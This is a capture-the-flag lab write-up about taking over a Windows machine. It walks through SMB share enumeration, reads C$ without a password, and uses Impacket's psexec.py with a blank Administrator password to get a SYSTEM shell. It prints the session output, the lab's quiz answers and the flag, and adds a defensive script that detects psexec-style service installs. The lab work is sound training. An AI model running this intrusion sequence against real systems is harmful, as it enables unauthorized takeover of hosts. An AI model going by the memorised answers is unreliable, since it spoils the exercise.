Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?
-Pn
By default, when nmap (run as root) performs host discovery, it sends
- an ICMP echo request,
- a TCP SYN packet to port 443,
- a TCP ACK packet to port 80, and
- an ICMP timestamp request.
A reply to any one of these probes is enough for nmap to consider the host up. (Run as an unprivileged user it falls back to TCP connect() probes to ports 80 and 443.)
However, in many real-world scenarios ICMP is blocked by the Windows firewall and ports 80 and 443 are closed. In that case nmap wrongly marks the host as down and never proceeds to the port scan.
To address this, use the -Pn switch, which skips host discovery entirely and treats every target as up.
What does the 3-letter acronym SMB stand for?
Server Message Block
What port does SMB operate on?
445
What command line argument do you give to smbclient to list available shares?
-L
What character at the end of a share name indicates it's an administrative share?
$
A trailing $ marks a hidden (administrative) share. The $ only keeps the share out of browse lists; it is still reachable by name, so it hides the share rather than protecting it.
The -U switch sets the login identity. Administrator is the built-in high-privilege account on Windows.
Which Administrative share is accessible on the box that allows users to view the whole file system?
C$
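The share classification described above, as an added example (not part of the original write-up): it parses the share table printed by smbclient -L, marks the hidden shares by their trailing $, and maps the built-in administrative shares to what they expose on the server. The listing is a constructed sample modelled on the default Windows share set plus one hypothetical user share named "Public"; it is not captured output from the box.

```python
"""Parse `smbclient -L` output and triage administrative shares."""
import re
from dataclasses import dataclass

# Constructed sample of `smbclient -L //<target> -N` output (not a capture).
# smbclient indents each share row with a tab.
SAMPLE_LISTING = """\

\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tPublic          Disk      Team documents
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
"""

# Server-side meaning of the built-in administrative shares.
ADMIN_SHARE_TARGETS = {
    "ADMIN$": r"%SystemRoot% (normally C:\Windows); psexec-style tools drop their service binary here",
    "IPC$": "named pipes used for RPC (svcctl, samr, ...); not a filesystem",
}

ROW = re.compile(r"^\t(\S+)\s+(Disk|IPC|Printer)\s*(.*?)\s*$")


@dataclass(frozen=True)
class Share:
    name: str
    kind: str
    comment: str

    @property
    def hidden(self) -> bool:
        # A trailing '$' hides the share from browse lists. It is not an ACL:
        # anyone who knows the name can still try to connect.
        return self.name.endswith("$")

    @property
    def target(self) -> str:
        if self.name in ADMIN_SHARE_TARGETS:
            return ADMIN_SHARE_TARGETS[self.name]
        # <drive letter>$ exposes the whole volume, e.g. C$ -> C:\
        m = re.fullmatch(r"([A-Za-z])\$", self.name)
        if m:
            return f"{m.group(1).upper()}:\\ (entire volume)"
        return "user-defined share"


def parse_share_listing(text: str) -> list:
    """Return the Share rows found in smbclient -L output, in listing order."""
    return [Share(*m.groups()) for m in (ROW.match(l) for l in text.splitlines()) if m]


def admin_shares(shares) -> list:
    """Hidden shares first, since they are the ones that give filesystem or SCM access."""
    return [s for s in shares if s.hidden]


if __name__ == "__main__":
    for share in parse_share_listing(SAMPLE_LISTING):
        flag = "hidden" if share.hidden else "browsable"
        print(f"{share.name:<10} {share.kind:<5} {flag:<10} -> {share.target}")
```

With a real listing, pipe smbclient's output into parse_share_listing; a C$ row tells you the whole volume is reachable by name, and a writable ADMIN$ is exactly what psexec.py needs later on this page.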
What command can we use to download the files we find on the SMB Share?
get
smb: \Users\Administrator\> cd Desktop\
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Thu Apr 22 03:16:03 2021
  ..                                 DR        0  Thu Apr 22 03:16:03 2021
  desktop.ini                       AHS      282  Wed Apr 21 11:23:32 2021
  flag.txt                            A       32  Fri Apr 23 05:39:00 2021

                3774463 blocks of size 4096. 1158389 blocks available

smb: \Users\Administrator\Desktop\> get flag.txt
getting file \Users\Administrator\Desktop\flag.txt of size 32 as flag.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?
psexec.py
Since we can write to the ADMIN$ share as Administrator, we can use a tool called psexec.py to turn this misconfiguration (a passwordless Administrator account) into an interactive SYSTEM shell. psexec.py is part of the Impacket framework.
Impacket is a framework written in Python for working with network protocols. It is focused on providing low-level programmatic access to the packets and for some protocols. In short, Impacket contains dozens of amazing tools for interacting with Windows systems and applications, many of which are ideal for attacking Windows and Active Directory.
One of the most commonly used tools in Impacket is psexec.py. It is named after PsExec from Microsoft's Sysinternals suite, since it performs the same function: giving us a fully interactive shell on a remote Windows machine.
How Impacket's psexec works
psexec.py first asks the target for its share list and looks for one it can write to. It uploads a randomly named executable (a copy of the bundled RemComSvc) to the ADMIN$ share, which maps to %SystemRoot% (normally C:\Windows), then opens the Service Control Manager over MS-RPC and registers that file as a Windows service with a random name and starts it. The service exposes a named pipe that carries the interactive shell, so the whole exchange rides on the existing SMB session to TCP port 445.
psexec.py requires credentials for a user with local administrator privileges, since both writing to ADMIN$ and creating a service need them. Once you successfully authenticate, it drops you into an NT AUTHORITY\SYSTEM shell, because the service runs as LocalSystem. On exit it stops and deletes the service and removes the uploaded binary, but the service-installation event stays behind in the System event log.
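The service-installation artefact described above, as an added example from the defender's side (not part of the original write-up): a small hunt over constructed Service Control Manager Event ID 7045 records that flags installs matching psexec.py's naming scheme. Impacket's serviceinstall.py picks a 4-letter service name and an 8-letter binary name and, when ADMIN$ is writable, registers %systemroot%\<binary>.exe as the service image, which is what BjhK and ckDQLGjh.exe in the session output on this page are. Both names can be overridden with psexec.py's -service-name and -remote-binary-name options, so this is a heuristic, not a signature. The event field names and the sample records (the AcmeUpdater service in particular) are assumptions made for the example.

```python
"""Flag psexec-style service installs in System log Event ID 7045 records."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Impacket psexec.py defaults: 4 random letters for the service name,
# 8 random letters + .exe dropped into ADMIN$ (= %systemroot%).
IMPACKET_SERVICE = re.compile(r"^[A-Za-z]{4}$")
IMPACKET_IMAGE = re.compile(r"^%systemroot%\\[A-Za-z]{8}\.exe$", re.IGNORECASE)
# Sysinternals PsExec uses a fixed service and binary name instead.
SYSINTERNALS_IMAGE = re.compile(r"^%systemroot%\\PSEXESVC\.exe$", re.IGNORECASE)


@dataclass(frozen=True)
class ServiceInstall:
    """Subset of the fields carried by a 7045 event (field names assumed)."""
    record_id: int
    service_name: str
    image_path: str
    account: str


def classify(ev: ServiceInstall) -> Optional[str]:
    """Return a verdict for suspicious installs, None for anything else."""
    if ev.service_name.upper() == "PSEXESVC" or SYSINTERNALS_IMAGE.match(ev.image_path):
        return "sysinternals-psexec"
    if IMPACKET_SERVICE.match(ev.service_name) and IMPACKET_IMAGE.match(ev.image_path):
        return "impacket-psexec"
    return None


def hunt(events: List[ServiceInstall]) -> List[Tuple[int, str, str]]:
    """(record id, service name, verdict) for every record that trips a rule."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict:
            hits.append((ev.record_id, ev.service_name, verdict))
    return hits


# Constructed sample log: record 1001 is modelled on the session output on
# this page, 1002 is a Sysinternals PsExec install, 1003 is a hypothetical
# benign product service. None of these are real captured events.
SAMPLE_EVENTS = [
    ServiceInstall(1001, "BjhK", r"%systemroot%\ckDQLGjh.exe", "LocalSystem"),
    ServiceInstall(1002, "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe", "LocalSystem"),
    ServiceInstall(1003, "AcmeUpdater", r"C:\Program Files\Acme\updater.exe", "LocalSystem"),
]

if __name__ == "__main__":
    for record_id, name, verdict in hunt(SAMPLE_EVENTS):
        print(f"record {record_id}: service {name!r} looks like {verdict}")
```

Because psexec.py deletes both the service and the binary when the operator exits, the 7045 record (together with the 7036 start/stop events and the SMB write to ADMIN$) is usually the durable evidence; pairing this rule with the source IP of the SMB session that preceded it gives the incident responder the attacker host as well.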
installation guide
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt
The syntax for getting an interactive shell from a target:
python psexec.py [domain/]username[:password]@hostIP
We know that the Administrator user has no password. If the password is left out of the target string, psexec.py prompts for it, and pressing Enter submits an empty password. So the command we are going to run is:
psexec.py administrator@10.129.208.116
C:\> whoami
nt authority\system
Submit root flag
f751c19eda8f61ce81827e6930a1f40c
┌──(kali㉿kali)-[~/Desktop/impacket]
└─$ psexec.py administrator@10.129.208.116
Impacket v0.12.0.dev1+20240725.125704.9f36a10e - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.129.208.116.....
[*] Found writable share ADMIN$
[*] Uploading file ckDQLGjh.exe
[*] Opening SVCManager on 10.129.208.116.....
[*] Creating service BjhK on 10.129.208.116.....
[*] Starting service BjhK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd \

C:\> dir *flag* /s
 Volume in drive C has no label.
 Volume Serial Number is EEE0-FCDB

 Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent

04/23/2021  02:38 AM               551 flag.lnk
               1 File(s)            551 bytes

 Directory of C:\Users\Administrator\Desktop

04/23/2021  02:39 AM                32 flag.txt
               1 File(s)             32 bytes

     Total Files Listed:
               2 File(s)            583 bytes
               0 Dir(s)   4,743,278,592 bytes free

C:\> type C:\Users\Administrator\Desktop\flag.txt
f751c19eda8f61ce81827e6930a1f40c